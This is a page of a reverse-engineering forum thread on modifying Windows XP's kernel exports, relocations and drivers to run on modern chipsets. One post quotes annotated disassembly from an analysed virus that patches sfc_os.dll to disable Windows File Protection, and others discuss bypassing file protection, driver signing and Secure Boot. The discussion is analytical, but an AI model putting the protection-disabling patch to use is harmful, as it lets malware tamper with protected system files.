Page 4 of 5 FirstFirst 12345 LastLast
Results 46 to 60 of 64

Thread: XP on modern systems

  1. #46
    This is more of a whine than anything. I get asked, as do others, why I am wasting my time with XP, a question for which I have no reasonable answer. Does one need an answer? I have personal reasons but nothing major, my main OS is W7 and , again, the question is why? I'll give several reasons why, after an irritating experience with W10 over the past few days.

    I decided to upgrade my old laptop to the 19xx version of W10 from the 18xx version, and it has turned out to be a big mistake. Microsoft has screwed the boot partition on it. I d/l'd the W10 upgrade, waited as long for it to install, only to be told that W10 cannot be installed on my """USB""" drive. Excuse me??

    After taking 40 minutes to 'upgrade' windows "10", as they announced while doing it, at the end, I get this brilliant message: This PC Can't Run Windows 10. How can anyone be so blatantly stupid as to tell a user his system meets the standards for the upgrade, apparently upgrades the OS, then claims, "You can't install Windows on a USB flash drive using Setup".

    For cripes sake, this puts Microsoft programmers in the lower levels of the IQ scale. How can anyone possibly allow such a poorly written piece of software to be released??? It knew I had W10 ver 1806 on a hard drive and that the 18xx version was being upgraded. Then it tells me I am using a USB drive????

    But, why? why? why? does it refuse to allow the user to examine the installation? There is no option, once you acknowledge their idiocy, they cleanup the installation, apparently meaning they undo the upgrade. They finish with this brilliance: "Something went wrong". Duh!!!! After 40 minutes of dowloading the upgrade followed by another 40 minutes of installing it, they claim: "Something went wrong".

    During it's initialization, it managed to screw my boot sector. Microsoft can take its W10 and stick it in a dark place. It is more stable than XP, although XP fairly whizzes along with an i5 processor and a 300-series chipset. It is not more stable than W7, however, and I see no clear advantage to using the over-bloated W10.

    [/whine off].

    BTW, I have just been educated on the EFI BIOS, which Msoft has designed to prevent older systems like XP from being dual-booted with W10. Somehow, I managed to change my BIOS from the BCD-based system to the EFI system. Another big mistake. Now I am trying to find out how to change it back.

    At the moment, I am enjoying working in XP as much as anything. It has it's limitations compared to W7 or W10 but it's fun. Isn't that the main thing?
    Last edited by WaxfordSqueers; February 8th, 2020 at 18:49.

  2. #47
    maybe i changed to os to much
    ms-dos, 3.11, windows 95 , windows 98 , windows 98 se, me, 2000, xp
    vista i did not have for a long time it took ms years to make neccesary upgrades
    windows 7 was ok for me

    then on the web you see every1 question is mind leaded to a windows 10 installation (instead of 8 or 8.1 even)
    for every problem asked every answer is upgrade to windows 10, all other information either says that or is deleted


    its not like that i didnt try windows 10 or it is psychological problem that i dont like this os

    its a rational choose over being a tablet, console,spyware, bug and incompatible software

    the recent taste of a new windows 10 installation i made was equally bad, the description of the software i wanted to use longly canceled due bugs before the right steps even could be taken
    then i did google around if this problems are known and yes here and there are informations so i tryed some of them installed some upgrades some framework versions, some patches
    and no the software still didnt do the job
    while in time windows 10 had secretly upgraded and tells me when to make the reboot (omg) and guess what after the upgrade nothing changed either
    then some guy was (really) talking to me that he use youtube and google and that works for windows 10 and its superb supergood
    i was like omg really do i install linux now ? there youtube and google also works
    and he was like you just have to install windows 10 and you get used to it and will like it over everything

    seems i will not move this time maybe i got to old maybe i do no longer want - i dont care

    what i know for certain and i confirmed that with the last try of installing windows 10 that this time i wont do the move

  3. #48
    Quote Originally Posted by Elenil View Post
    ...while in time windows 10 had secretly upgraded and tells me when to make the reboot (omg) and guess what after the upgrade nothing changed either
    Getting back to the problem at hand, I have been studying the XP ntoskrnl using tools like cffexplorer, and I find it quite interesting to see how the exports are laid out inside. The code from each export seems to follow directly the code of the previous export and I see a location where they are all referenced, something like an import table.

    I have also noted that ntoskrnl and other system files seems to have a related encryption used to certify them. I noticed that some people have a means of re-certifying modded drivers and that's something I need to learn, not to do anything illegal but to stop them being rejected by the OS. I know that can be turned off within Windows but I'd like to learn how the certification process works.

    Keeping in mind that RCE is a reversing forum, I won't extend this debate about Microsoft other than to reply to Elenil's comment. I inserted my opinion partly out of frustration with Microsoft but that has a lot to do with why I am trying to modify XP to make it work on modern chipsets and processors. Therefore, it is related to reversing in a way, although not directly.

    The point made by Elenil, that Microsoft now controls the upgrade process almost completely, forcing users to use what they dictate is best for them, is a good point. I don't know if this is still the case but Microsoft was using a torrent approach to distributing W10 updates. In other words, they were using the hard drives on the computers of users with which to share the distribution. I had to turn that option off on mine and I'd better check to see if it's still the case. Since torrents are generally considered a system for sharing copywrited software and goods, it seems hypocritical of Msoft to take advantage of a piracy network to distribute W10. Furthermore, they think nothing of forcing their way onto the hard drives of users without asking permission. They don't even think it's necessary to advise users of what they are doing.

    The reason they likely force the update is that the system has become automated to the point it is not possible to pick the desired updates. With W7, that became a major issue since Msoft was sneaking in questionable updates aimed that forcing users up to W10.

    In my last post I related an experience where I waited 40 minutes for an upgrade to install only to be advised at the end that 'Something went wrong'. They did not seem to think anything was going wrong as they merrily reported the progress. Something was obviously going right, till the end, when they suddenly saw my system as a USB device rather than a W10 installation. On the next reboot, I had to wait as they undid the update.

    I have since learned that the likely cause is corrupted upgrade software. It seems some updates scheduled for installation were never installed and that threw a wrench into the upgrade mechanism. Furthermore, when a Windows OS is upgraded from another Windows OS, or cloned from another OS, it gets marked in the registry as a portable system. It seems Msoft has concluded my system is not only portable, that it a USB drive.

    After 40 minutes of installing the update, it apparently had no idea what device it was installing to. After completing the installation to this phantom device it concluded it could not be done and discarded the installation. Furthermore, Msoft has been doing the same since Win 8 without figuring out what is wrong, not only for major upgrades, but ordinary upgrades as well. At least, they don't seem to have figured it out well enough for implementation in their most recent W10 update.

    Open source Win 7????

    https://forums.malwarebytes.com/topic/256167-microsoft-urged-open-source-windows-7-to-undo-past-wrongs/

  4. #49
    Taking Kayaker's advice re looking through RCE archives for information on working with exports to add functions from newer versions of Windows to earlier versions. Mine is dated 2005, or something like that, and I wonder if it extends beyond that.

    The best I could come up with is this RCE thread:

    http://www.woodmann.com/forum/showthread.php?15715-How-to-add-Function-to-Various-System-DLL/page2&highlight=ntoskrnl

    In the thread, someone is asking about adding functions to Windows, I think to "THE" kernel. However, Kayaker pointed to another link, apparently one provided by the person, and I took a look there. I emphasized "THE" kernel because the impression I got reading the thread below is that the debaters regard kernel32 as the kernel and not ntoskrnl. None of them really seemed to have a grasp of the Windows system structure as explained by Russinovich et al, and although my understanding is primitive I have read such authors and have a decent grasp of what is going on and why BSODs would happen if care was not taken to understand how the system works.

    Oddly enough, I used to have the same idea anout k32 till I learned that k32's role is to interface user code with kernel code via ntdll.dll. Since I read a while back that ntoskrnl is the first system file called by the loader and that it calls hal.dll to setup the hardware, I got it that ntoskrnl is the man. It runs the system overall, not k32. Maybe I'm wrong.

    http://www.msfn.org/board/topic/175529-remodeling-windows-xp-kernel32/?page=5

    The impression I got was people debating the procedure with none of them clear on what is involved. I know the thread is titled Remodeling Windows XP Kernel32 and the aim is to give XP compatibility with newer versions. But why K32 itself and not ntoskrnl?

    It did give me an idea, however. Would it possibly be better to use a W7 or Vista kernel in XP and find a way to negate exports that are not required? Might be a lot more work. Might also be a horror show if the W7 kernel has been totally rewritten and all the ordinals have changed. Not easy being a reverser sometimes.

    Actually the best advice came from Aimless on page 1 of the RCE link above but it was generally about PE headers, code caves, etc. Kayaker did advise that not a lot was known about modifying ntoskrnl and it seems we are no further ahead than folks were at the 2nd link in 2016.

    I would like to approach this from more than a shotgun approach of inserting functions and hoping they work. I'd like to be able to trace through ntoskrnl and hal code to see how the exports are being implemented. For example, if memcpy is called by an app, how is the call fully implemented. How is memcpy reached in ntoskrnl...how is it found?

    Here's a hint from the PE Header:
    Code:
    Export Directory
    +0 DWORD   Characteristics;
    4  DWORD   TimeDateStamp;
    8  WORD    MajorVersion;
    a  WORD    MinorVersion;
    c  DWORD   Name;
    10 DWORD   Base;
    14 DWORD   NumberOfFunctions;
    18 DWORD   NumberOfNames;
    1c DWORD   *AddressOfFunctions;
    20 DWORD   *AddressOfNames;
    24 DWORD   *AddressOfNameOrdinals;
    I am still not clear on whether windbg can trace the code to that depth without setting a BP and I may have to fire up softice to do it.

    Some people are now modifying ntoskrnl and hal using different means but they are having limited success. I think that's because they are decompiling ntoskrnl and hal, adding functions, then recompiling. Not clear on how that works since I have yet to see a decompilation that is clean enough to recompile it. Apparently it is being done, I have seen the results.

    I am not too clear either on the subject of relocations. I have seen it explained in many places but they seem to talk about what a relocation does and not why it is done. I know that the image on disk is not the same as the image in memory, or the part of the RAM image stored temporarily in the pagefile. I would think that the code portion stored in the executable file would be stored consecutively in RAM from it's base at 0x04000000 but I also know the image is not always stored at that address.

    Someone said something in an article that turned the light on. If you modify a file, by inserting code, then the remainder of the image needs to be relocated. However, that is not normally the case, so why would code need to be relocated as the disk image is moved to the RAM image? Is it a compiler issue wherein it is not known at compile time where certain code or data should be placed?

    Anyway, I am getting a better picture of what I need to do to add exports and I am leaning toward creating a new section rather than finding a code cave. I have actually done that 'once' for a reason that now escapes me, and it worked.
    Last edited by WaxfordSqueers; February 12th, 2020 at 16:52.

  5. #50
    for those who not know about this
    you can add a function name all the time
    but the function code you also have to do

    otherwise your added function doesnt have code and that do guess what dont work

    you right with the pe header there is this information (normed)


    blackwingcat what made the 2000 version had a big advantage (the problem wax is talking about "limited success")
    he has the released version of 2003 server (what is basicly xp)
    unlikely the windows 2000 kernel extener, the xp kernel extender there assembly code has to be readed out
    either transfered to a c++ variant or fixing the assembly code to work for this function



    from the 2003 kernel version you have the c++ code from microsoft you can just compile the code
    and redirect the functions
    since its from microsoft itself the functions work too

    what this approach is doing it patching the export table at runtime (with more functions) (wax posted the pe header norm)
    and redirect it to a dll that has been compiled with the functions

    a executable (program,system driver) is searching for example the ntoskrnl.exe for its exports
    now it finds the "patched" redirected function what leads to your module/dll

    now the calling executable can use the "new function/s"


    the memcpy are the easy functions they dont use internal functions
    there are like functions that can be copied without any issues memcpy being one of those
    a little bit harder it gets if this function is calling internal functions and you have to fix that together
    the 3 version is the hardest in those the function might not be present at all
    then you have to write the entire function new to your os if that use internals that are not present in the os this is then getting more work


    yep the problem with the relocs is not present if you use a module/dll
    that the compiler do for you then
    the approach where you need that is when patching a static module not using a own module where relocs are done by your compiler

    if you just copy paste a function without relocs then on a static module the relocs are not done
    the offset that is accessed without relocs is maybe not present (page fault)

    the image get a own virtual memory address space it used to be always 0x00400000
    of your file its where 0x00000000 is
    the virtual address space may now start with 0x10000000 or something
    then the file offset is still at 0x00000000

    the idea behind this was simple that every program a own "address space"
    if you gone a different approach like executable a and b
    while a starts at 0x00000000 and ends at 0x00100000 then b would start at 0x00100000
    and could access a or a accessing b in kernel mode that being the case

    in the protected mode (that is still every common) this is normed over GDT, PDBR, SEGMENT, Virtual Offsets (EIP), PTE, PDE (i could write more here but i let it be with those)
    they norm the physical address space

    the compiler has to build up the executable therefore the compiler is programmed to calculate the relocs
    the other part is windows (or a os) that gives the relocs a second value where the module was mapped at
    thus those got the right offsets where the functions are at

    to my knowlegue that isnt illegal

  6. #51
    Teach, Not Flame Kayaker's Avatar
    Join Date
    Oct 2000
    Posts
    4,128
    Blog Entries
    5
    Has anyone brought up Windows File Protection (WFP) yet?

  7. #52
    @Elenil...I'll get back to you soon when I get a chance to digest your comments. Good stuff.

    @Kayaker...

    Quote Originally Posted by Kayaker View Post
    Has anyone brought up Windows File Protection (WFP) yet?
    I realize you likely know all rhis already. The way I have dealt with WFP at the XP and W7 level is to replace the file in the i386 cache before replacing it in the sys32 directory or wherever. Did that recently with a modded acpi.sys and when SFP is run, it replaces the modded file with the modded file.

    I would like to certify the file but I don't know how to do that yet. You need a .cat file but right now I have driver checks disabled. You can disable spf as well I've heard. Probably not a good idea in the long term but it's handy when working with modded files.

    Another method I have used is replacing modded files in XP offline. I hot plug XP when W7 is running and SFP does not seem to bother with the replaced file. Don't know why.

  8. #53
    Teach, Not Flame Kayaker's Avatar
    Join Date
    Oct 2000
    Posts
    4,128
    Blog Entries
    5
    Quote Originally Posted by WaxfordSqueers View Post
    The way I have dealt with WFP at the XP and W7 level is to replace the file in the i386 cache before replacing it in the sys32 directory or wherever. Did that recently with a modded acpi.sys and when SFP is run, it replaces the modded file with the modded file.
    Heheh, I kind of wondered if that would work.

    While there are more official ways of disabling WFP, there was an interesting trick by a virus I analyzed once, mentioned here

    http://www.woodmann.com/forum/entry.php?36-IDC-scripting-a-Win32-Virut-variant-Part-2

    This was a runtime patch so the vx could infect system files, but I was wondering if you could do the same thing by hard modifying sfc.os.dll
    Here's part of the post


    WFP is disabled by patching in a call to ExitThread immediately after a NtWaitForMultipleObjects call in an sfc.os.dll function called SfcWatchProtectedDirectoriesWorkerThread.
    The function name pretty much describes what it does, it's a worker thread which continually monitors for file changes from a protected dll list. After patching SfcWatchProtectedDirectoriesWorkerThread the virus calls SfcTerminateWatcherThread.

    Here is what the function looks like in code:

    Code:
                 Code:
         // The search pattern in sfc.os.dll
    
    :00403CE4          Pattern_SFC_OS_DLL:    ; DATA XREF: Disable_WFP+F
    :00403CE4 6A 01       push    1
    :00403CE6 6A 01       push    1
    :00403CE8 FF 33       push    dword ptr [ebx]
    :00403CEA FF 73 04    push    dword ptr [ebx+4]
    :00403CEA          ; -----------------------------------------------
                          // part of call ds:NtWaitForMultipleObjects
    :00403CED FF 15       dw 15FFh   
    
    
    
    :00403CEF Disable_WFP     proc near
    
    // EAX = base address of sfc.os.dll returned from GetModuleHandleA
    
    :00403CEF       test    eax, eax
    :00403CF1       jz      short locret_403CE3
    :00403CF3       push    0Bh
    :00403CF8       mov     edx, eax
    :00403CFA       pop     ebx
    :00403CFB       add     edx, [eax+IMAGE_DOS_HEADER.e_lfanew]
    :00403CFE       lea     esi, Pattern_SFC_OS_DLL
          
                            // SectionTable.PointerToRawData .text section
    :00403D04       mov     edi, [edx+10Ch]
                            // SectionTable.SizeOfRawData .text section
    :00403D0A       mov     ecx, [edx+108h]
           
    :00403D10       add     edi, eax
    :00403D12       sub     ecx, ebx
    :00403D14
    :00403D14 Find_Pattern:           ; CODE XREF: Disable_WFP+2E
    :00403D14       pusha
    :00403D15       mov     ecx, ebx
    :00403D17       repe cmpsb
    :00403D19       popa
    :00403D1A       jz      short loc_403D21
    :00403D1C       inc     edi
    :00403D1D       loop    Find_Pattern
    :00403D1F       jmp     short locret_403CE3
    :00403D21 ; ----------------------------------------------------
    :00403D21
    :00403D21 loc_403D21:             ; CODE XREF: Disable_WFP+2B
    :00403D21       add     edi, 0Fh
    :00403D24       push    edi
    :00403D25       mov     edx, esp
    :00403D27       push    ebx
    :00403D28       mov     ecx, esp
    :00403D2A       push    eax
    :00403D2B       push    esp             ; OldProtect
    :00403D2C       push    40h             ; Protect
    :00403D2E       push    ecx             ; RegionSize
    :00403D2F       push    edx             ; BaseAddress
    :00403D30       push    0FFFFFFFFh      ; hProcess
    :00403D32       call    NtProtectVirtualMemory
    :00403D38       add     esp, 0Ch
    :00403D3B       mov     edx, ExitThread
    :00403D41       sub     edx, edi
    :00403D43       sub     edx, 7
    
    // Patch in ExitThread call immediately after
    // NtWaitForMultipleObjects in sfc.os function
    // SfcWatchProtectedDirectoriesWorkerThread
    
    // patch in push eax opcodes (6A00) + Call near, relative opcode (E8)
    :00403D46       mov     dword ptr [edi], 0E8006Ah  
          
    // patch in ExitThread displacement
    :00403D4C       mov     [edi+3], edx
              
    :00403D4F       retn
    :00403D4F Disable_WFP     endp ;
    Once I figured out what the code was doing I was able to do a search and found that the entire routine for disabling WFP was ripped from here:

    Win2k.SFPDisable
    http://www.hackemate.com.ar/ezines/29a/29a-6/Articles/29A-6.001

    (link is dead but those 29A ezines should be around somewhere)

  9. #54
    Quote Originally Posted by Kayaker View Post
    Once I figured out what the code was doing I was able to do a search and found that the entire routine for disabling WFP was ripped from here:
    Here's the link from Wayback:

    https://web.archive.org/web/20080415111135/http://www.hackemate.com.ar/ezines/29a/29a-6/Articles/29A-6.001

    They seem, as you say, to be more interested in injecting a virus at the test eax, eax point rather than stopping SFC. Although I have no interest in viruses (or is it virii??) I'll read through it to get an idea of how the system is compromised.

    Perhaps I am being naive in generalizing my means of bypassing SFC, one would think the coders of Windows would have seen that coming. It is interesting that it can be bypassed so easily.

    The more urgent problem for me is the legitimacy checker for drivers. Drivers normally come with a .cat file, and those files are kept in windir\system32\catroot and ...\...\catroot2. Have no idea how they work but it seems there is an encryption process in place that verifies the authenticity of the drivers. Msoft has supplied a means of turning that off at boot time so you can test drivers.

    I am thinking that a modded kernel should be detected early on in the boot process but it seems folks are merely modding it with no issues. The main issue seem to be getting the CRC right in the PE Header. In a modern BIOS like the one with my 300-series chipset, they have a feature called Secure Boot which is designed to check the boot loader for authenticity. It is controversial, IMHO, because it can prevent an OS like Linux from loading and that is really none of Microsoft's business.

    It seems Linux manufacturers have to now apply to Microsoft for a bootloader signed by Msoft. I think that should be made illegal since the user owns the machine and its BIOS. BIOS manufacturers should not be designing the BIOS for Msoft so they can dictate how it is used.

    Anyway I have turned off Secure Boot in my machine but it is not a trivial matter of setting a switch to 'off'. You have to delete the encryption keys associated with the BIOS, hopefully after storing them for replacement.

  10. #55
    Quote Originally Posted by Elenil View Post
    from the 2003 kernel version you have the c++ code from microsoft you can just compile the code and redirect the functions since its from microsoft itself the functions work too

    what this approach is doing it patching the export table at runtime (with more functions) (wax posted the pe header norm)and redirect it to a dll that has been compiled with the functions
    Trying to grasp this. If you use the export table address in the PE header, you are directing apps to the dll you created, which contains functions to be added. What if the app needs an export that is in the exe/dll? I can't visualize how to do both without added code to the exe/dll to do the switch? Or creating an external patcher.

    I am looking at something simpler, although the idea of a dll to contain the required exports sounds good. I stiill need to look at ntoskrnl more closely to see how it implements a call from an app and directs it to the required export. I'd like to understand that process clearly.

    Quote Originally Posted by Elenil View Post
    a executable (program,system driver) is searching for example the ntoskrnl.exe for its exports now it finds the "patched" redirected function what leads to your module/dll
    How does 'patch' know which exports are in the external dll and which ones are currently in the exe/dll? If an app is looking for memcpy_s, which needs to be added to ntos, and it is in the external dll, how is it directed to the external dll. That dll would need an export table of it's own, would it not? Or could you reference memcpy_s in ntos and direct it to the external dll with a call?

    Quote Originally Posted by Elenil View Post
    the memcpy are the easy functions they dont use internal functions
    That's interesting, I know some exports will call other functions and if that export is taken from a newer version of ntos there will have to be a means of providing the fuction required. I think that is a problem with ndis.sys where another system file is involved that is not available in XP.

    There is also the issue, I think Kayker mentioned it, that some of the missing exports may not be required in XP. For example, if I want to get a W7 LAN driver going in XP, and it calls a function that is checking to see if there are multiple processors, I may be able to bypass that export. I know some of them are related to logging for Event viewer. I don't care about event logging although it may cause issues elsewhere.


    Quote Originally Posted by Elenil View Post
    if you just copy paste a function without relocs then on a static module the relocs are not done the offset that is accessed without relocs is maybe not present (page fault)
    I need to read more on relocs. Still not grasping the basics of why they are used. I have a good understanding of the virtual address space but I don't understand why an image on disk does not contain the required information to locate the proper address wrt the base address at 0x04000000 and why it needs to relocate certain addresses while loading the image.

  11. #56
    Quote Originally Posted by WaxfordSqueers View Post
    Trying to grasp this. If you use the export table address in the PE header, you are directing apps to the dll you created, which contains functions to be added. What if the app needs an export that is in the exe/dll? I can't visualize how to do both without added code to the exe/dll to do the switch? Or creating an external patcher.

    I am looking at something simpler, although the idea of a dll to contain the required exports sounds good. I stiill need to look at ntoskrnl more closely to see how it implements a call from an app and directs it to the required export. I'd like to understand that process clearly.

    How does 'patch' know which exports are in the external dll and which ones are currently in the exe/dll? If an app is looking for memcpy_s, which needs to be added to ntos, and it is in the external dll, how is it directed to the external dll. That dll would need an export table of it's own, would it not? Or could you reference memcpy_s in ntos and direct it to the external dll with a call?

    That's interesting, I know some exports will call other functions and if that export is taken from a newer version of ntos there will have to be a means of providing the fuction required. I think that is a problem with ndis.sys where another system file is involved that is not available in XP.

    There is also the issue, I think Kayker mentioned it, that some of the missing exports may not be required in XP. For example, if I want to get a W7 LAN driver going in XP, and it calls a function that is checking to see if there are multiple processors, I may be able to bypass that export. I know some of them are related to logging for Event viewer. I don't care about event logging although it may cause issues elsewhere.


    I need to read more on relocs. Still not grasping the basics of why they are used. I have a good understanding of the virtual address space but I don't understand why an image on disk does not contain the required information to locate the proper address wrt the base address at 0x04000000 and why it needs to relocate certain addresses while loading the image.
    windows is reading the PE header and its Export Table as the norm you posted
    it then write those addresses into the import module
    they are offsets of 32 bit size
    it doesnt matter if that is not inside the orginal dll (you can do that too but thats a different way)
    well the thing is if the export name is ntoskrnl the ntoskrnl is loaded in memory
    if your dll lets call it ntoskrnl_wrapper.dll got the other missing functions that dll also has to be loaded
    then you have 2 modules in your memory

    redirecting is pretty common even in windows win32k.sys for example do exactly that
    the patcher could be in dllmain()
    as soon this is done all other modules will read out the patched table
    how many export a module have you already posted in the PE export norm (number or ordinals)
    it does not need to know on what module they are on they are 32 bit offsets that can lead from 0x00000000 to 0xFFFFFFFF, ansi string names , count number (number of ordinals)
    offset where the export table begins (addressoffunctions(32 bit values), addressofnames(string), addressofnameordinals(number))
    memcpy being a name it will reconize that name in the list
    then the ordinal is known and then the 32 bit offset is known
    yes you add that name, runtime offset, and ordinal number
    thus the import module know where to call that function


    there easy functions that can be copied (memcpy being on of those)
    a multiple processor check is present in xp on windows 7 it use partly the same functions so you have to write a function that reads out that value and fix maybe some parameters thats all
    totally missing functions are harder to add only IF they use functions that are not present in your OS-Module

    that ndis functions certainly can be added but the question is what those functions use internal

    the windows CE version is a good target because the function at this os are present in win2k or winxp windows ce is a downgraded nt os
    it includes far less functions then xp does
    a other reason is that it has to use present functions , that means they are present in xp


    the things with the relocs is a very old cracking problem remember reconstructing pe ? imports exports ? functions ?
    a lot of protectors mess up with that
    its classical reversers work

    BUT that you dont need for the dll method

  12. #57
    Quote Originally Posted by Elenil View Post
    that ndis functions certainly can be added but the question is what those functions use internal ...the windows CE version is a good target because the function at this os are present in win2k or winxp windows ce is a downgraded nt os it includes far less functions then xp does a other reason is that it has to use present functions , that means they are present in xp
    I have been keeping the CE option in mind since you mentioned it a while back. The only issue I have is that I use the Intel native LAN drivers on the other end and the Ethernet Controller on my B360 chipset is a 1219-V which would have no trouble talking to the controller on the other end since it is Intel as well. Both have fairly advanced Ethernet options and I fear the CE driver may not be up to meeting all the requirements. Also, if you look in the INF file for the Ethernet controller, it has many sections for different forms of the controller, all with model specific parameters. Mine, the 1219-V is listed a (7).

    Problems arise when I try to run the Ethernet connection at 1 gigabyte. If there are issues, it drops back to about 100 Mhz and that's dead slow for transferring large files. My desktop wireless connection also depends on the Ethernet connection. I don't know if the CE driver would create headaches in that respect.

    Trying to keep in mind that I won't be using XP that much on a network, but at present, I am transferring all files to XP using a USB thumb drive. I have managed to establish a basic wireless connection for Internet using a Cisco USB device and I can download required files using Internet Explorer 8.

    I would like to eventually establish a serial connection so I can run windbg remotely in k-mode but I don't know if my serial port is operational. I do need an SMBus driver, but that's another issue. Then, of course, I'd like to look into getting softice operational for 32-bit. I am thinking about firing it up in a VM just to look at how apps call the exports in ntoskrnl. Last time I tried with windbg, it got to a SYSENTER and jumped right over it and out the back end. I could not get it to single-step into the SYSENTER as I have done with sice many a time.

    Of course, I could try BPs, but I want to see exactly what a call to something like memcpy does in the kernel, tracing it from the call in the app right into the kernel.

  13. #58
    Since Windows 10 has compatibility modes for Windows versions back to W95, I wonder if there is a way to use that in reverse to make earliers version compatible with newer versions.

    Compatibility is done with 'shims', which is code used to redirect older apps to code that will work for them. Since the W10 kernel is 2.5 times the size of the W7 kernel and about 4x the size of the XP kernel, I wonder if the size difference is in part due to the required shims for compatibility? Maybe there is shim code out there that could be used as a template.

    https://techcommunity.microsoft.com/t5/ask-the-performance-team/demystifying-shims-or-using-the-app-compat-toolkit-to-make-your/ba-p/374947

  14. #59
    Teach, Not Flame Kayaker's Avatar
    Join Date
    Oct 2000
    Posts
    4,128
    Blog Entries
    5

  15. #60
    Quote Originally Posted by Kayaker View Post
    Using shims is an interesting idea.
    Thanks for links Kayaker. Interesting stuff and a lot to digest.

    Obviously, the idea of shims is related to backward compatibility but Ionescu's article, or talk, claims shims can be used on devices and drivers like ndis.sys. Maybe if shims were used in W7 to make XP compatible with W7 the code might reveal how to go about it more efficiently, making it easier to implement W7 ndis.sys in XP. Then again, you can over-think things. Sometimes better to just do it the old way.

Similar Threads

  1. Embembeded systems
    By tazBRC in forum Off Topic
    Replies: 2
    Last Post: April 26th, 2010, 21:29
  2. dr7.gd on mp systems running sice
    By deroko in forum Blogs Forum
    Replies: 5
    Last Post: February 11th, 2008, 10:16
  3. Realtime systems and OS dependency
    By Hero in forum Advanced Reversing and Programming
    Replies: 5
    Last Post: September 17th, 2006, 12:34
  4. keyboard problem with SoftICE on NT systems
    By quasar in forum Tools of Our Trade (TOT) Messageboard
    Replies: 4
    Last Post: March 31st, 2004, 03:40
  5. Replies: 6
    Last Post: August 25th, 2003, 13:02

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •